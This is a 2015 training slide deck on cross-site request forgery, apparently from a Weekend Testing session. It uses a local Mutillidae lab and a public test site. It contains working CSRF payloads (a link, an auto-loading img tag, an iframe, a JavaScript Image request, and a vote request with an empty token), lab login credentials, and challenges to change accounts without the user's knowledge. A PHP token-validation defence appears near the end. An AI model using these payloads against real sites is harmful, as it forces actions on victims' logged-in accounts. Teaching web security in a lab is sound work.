Date posted: 12-Aug-2015
Category: Technology
Uploaded by: abhinav-sejpal
WHO AM I
I'm a new-generation Exploratory Tester
Researcher & Reader in free time
Speaker at Null & OWASP Community
Facilitator at Weekend Testing
Crowd Tester (AKA. Bug Bounty Hunter)
Reported security vulnerabilities for 50+ unique customers all over the world, including Apple, Yahoo, Outlook, Adobe, etc.
Proficient at Functional, Usability, Accessibility & Compatibility Testing
Love to develop nasty code & hack it :)
Works as Quality Analyst at passbrains.com, AKA. Bug Wrangler
DISCLAIMER
This presentation is intended for educational purposes only and I cannot be held liable for any kind of damage done whatsoever to your machine, or other damages. Please don't try this attack on anyone else's system without having context knowledge or permission; this may harm someone directly or indirectly.
Feel free to use this presentation for practice or education purposes.
^ I hope - You gotcha ^
SOCIAL MEDIA FEED
Hashtags for this session: #BitzNightTesting, #CSRF
Twitter handles for feedback: @weekendtesting, @Abhinav_Sejpal
G+: http://goo.gl/kMAOs1
AGENDA
Introduction
Set up Pen Testing LAB
Overview of HTTP Request
Intercept the HTTP Request using Proxy (MITM)
Understanding cross site attacks
Testing for a cross site request forgery risk
Attack
Anti-forgery Attacks
Common Defences Against CSRF
SETUP THE TEST LAB
Install XAMPP
Acronym for:
X (to be read as "cross", meaning cross-platform)
Apache HTTP Server
MySQL
PHP
Perl
Why MySQL? It's the girlfriend of PHP
TARGETED APPLICATION
Client side language: HTML & JavaScript
Server side language: PHP
DB: MySQL
Why PHP? - Any answer here?
MySQL <3
http://w3techs.com/technologies/overview/programming_language/all
PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE.
2013 Server-side Programming Language of the Year
Don't mind the power of PHP > Facebook & Yahoo
http://w3techs.com/blog/entry/web_technologies_of_the_year_2013
PLAY GROUND
MUTILLIDAE
It's a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application.
V.2X developed by Jeremy Druin aka webpwnized.
CSRF AKA. XSRF
THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS IN A USER'S BROWSER.
Permission faking / stealing
Disruption of the normal sequence of the site
http://127.0.0.1/xampp/mutillidae/index.php?do=logout
DEMO #1
Login ID - admin
password - adminpass
HTTP GET Request
<a href= >
: ANSWER DEMO 1 :
<html>
<title> CSRF Demo 1 </title>
<a href="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> Click me </a>
</html>
Yes, it's not dangerous, but annoying
UNDERSTANDING
The logout page has a simple HTTP GET that requires no confirmation.
Every user who visited that page would immediately be logged out - that's CSRF in action.
SO WHAT DO YOU THINK, IT'S ALL ABOUT THE CLICK?
Shh, No!!
Would you like to write a CSRF exploit without a click??
<img src= >
CSRF GET Request with Image Tag
<html>
<title> CSRF Demo 1 </title>
<img src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout">
</html>
HTTP REQUEST
<iframe src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"></iframe>
<script> var X = new Image(); X.src = "http://127.0.0.1/xampp/mutillidae/index.php?do=logout"; </script>
<html>
<title> CSRF Demo 1 </title>
<a href= > Click me </a>
</html>
:: SOLUTION #1 ::
http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote
IS IT EASY TO CREATE A CSRF HTTP REQUEST?
No - you should try out
IronWASP
CSRF PoC Generator - Tool for automatically generating exploits for CSRF vulnerabilities
* One Click POC *
* Hybrid automation *
Thanks a ton to Lava & Jayesh
{ POST HTTP Request }
CHALLENGE #2
CHALLENGE #3
Add a user without the admin's knowledge
LIVE CHALLENGE
* SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE PASSWORD TEST
CSRF & XSRF
Update the user info without their knowledge
http://testphp.vulnweb.com/userinfo.php
POPULAR COOL FINDINGS
Facebook CSRF by Amol, worth USD 5000
GOOGLE GROUPS PROFILE CSRF
Google Account display pic deletion
Facebook Account deactivation
Advanced Learnings - CSRF Token Validation Fail
http://haiderm.com/csrf-token-protection-bypass-methods/
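The Solution #1 request above submits an empty csrf-token parameter over GET, and the token-bypass write-up linked here is about validation that lets such requests through. As an added example (not code from these slides or from Mutillidae), here is how the user-poll handler could validate a synchronizer token in PHP so that a missing, blank or wrong token fails closed and the vote is accepted only over POST; the parameter names follow the Solution #1 URL, while the session key name and the form markup are my assumptions.

```php
<?php
// Added example, not from the slides or from Mutillidae: a synchronizer-token
// check for the user-poll form. Parameter names (csrf-token, choice, initials,
// user-poll-php-submit-button) follow the Solution #1 request; the session key
// 'csrf-token' is an assumption.
session_start();

// Issue one unpredictable token per session when the form is rendered.
function csrf_issue_token(): string
{
    if (empty($_SESSION['csrf-token'])) {
        $_SESSION['csrf-token'] = bin2hex(random_bytes(32)); // 256-bit random
    }
    return $_SESSION['csrf-token'];
}

// True only when a non-empty string token was submitted and it equals the
// session token. A missing, blank or non-string token (csrf-token= or
// csrf-token[]=) fails closed instead of being treated as a match.
function csrf_token_is_valid($submitted): bool
{
    $expected = $_SESSION['csrf-token'] ?? '';
    if ($expected === '' || !is_string($submitted) || $submitted === '') {
        return false;
    }
    return hash_equals($expected, $submitted); // constant-time comparison
}

// State change only over POST: a GET like Solution #1 never reaches the vote.
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && isset($_POST['user-poll-php-submit-button'])) {
    if (!csrf_token_is_valid($_POST['csrf-token'] ?? null)) {
        http_response_code(403);
        exit('Vote rejected: CSRF token missing or invalid');
    }
    $choice   = $_POST['choice']   ?? '';
    $initials = $_POST['initials'] ?? '';
    // record_vote($choice, $initials);  // application-specific, not shown
    exit('Vote recorded');
}

// Render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_issue_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="post" action="index.php?page=user-poll.php">
  <input type="hidden" name="csrf-token" value="<?= $token ?>">
  <input type="radio" name="choice" value="nmap"> nmap
  <input type="text" name="initials" maxlength="3">
  <input type="submit" name="user-poll-php-submit-button" value="Submit Vote">
</form>
```

A quick check is to replay the Solution #1 URL against this handler: the GET branch never runs the vote, and a POST with csrf-token left blank gets a 403.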
INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU SHOULD BE FOLLOWING ON TWITTER
Thank you, http://garage4hackers.com/ community
- Twitter Folks -
@riyazwalikar, @TroyHunt, @yog3sharma, @makash & @anatshri
CREDITS
Big thank you to @weekendtesting, @srinivasskc & you all.
LICENSE AND COPYRIGHTS
https://slides.com/abhinavsejpal/weekend-testing-csrf
Copyright 2013-2014 Abhinav Sejpal
-----
(CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy